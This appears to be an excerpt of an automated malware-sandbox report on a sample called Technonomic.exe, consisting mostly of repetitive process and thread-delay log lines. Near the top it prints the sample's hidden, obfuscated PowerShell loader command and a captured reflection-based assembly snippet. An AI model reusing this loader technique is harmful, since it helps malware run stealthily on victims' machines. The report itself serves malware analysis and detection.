            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Armadaers)), $Litzirandvseners49).DefineDynamicModule($Ophugningernes, $false).DefineType($Knsbestem130, $Kapitals125, [System.Multica
            Source: C:\Users\user\Desktop\Technonomic.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Spookological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Ifrt.Syd';$Transporterede=$Spookological.SubString(26028,3);.$Transporterede($Spookological) "
            Source: C:\Users\user\Desktop\Technonomic.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Spookological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Ifrt.Syd';$Transporterede=$Spookological.SubString(26028,3);.$Transporterede($Spookological) "Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045424B1 push ecx; retf 7_2_045424B2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0454050B push ebx; ret 7_2_04540519
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04540DC3 push ebp; retf 7_2_04540DDE
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04540B69 pushad ; ret 7_2_04540B77
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04540BBE push eax; iretd 7_2_04540BCD
            Source: C:\Users\user\Desktop\Technonomic.exeFile created: C:\Users\user\AppData\Local\Temp\nsa27B0.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable\Technonomic.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599874Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599751Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599625Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599515Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599406Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599297Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599187Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599078Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598844Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598711Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598609Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598500Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598390Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598280Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598172Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598062Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597953Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597843Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597734Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597625Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597515Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597406Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597297Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597187Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597073Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596969Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596859Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596750Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596640Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596531Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596422Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596312Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596203Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596093Jump to behavior
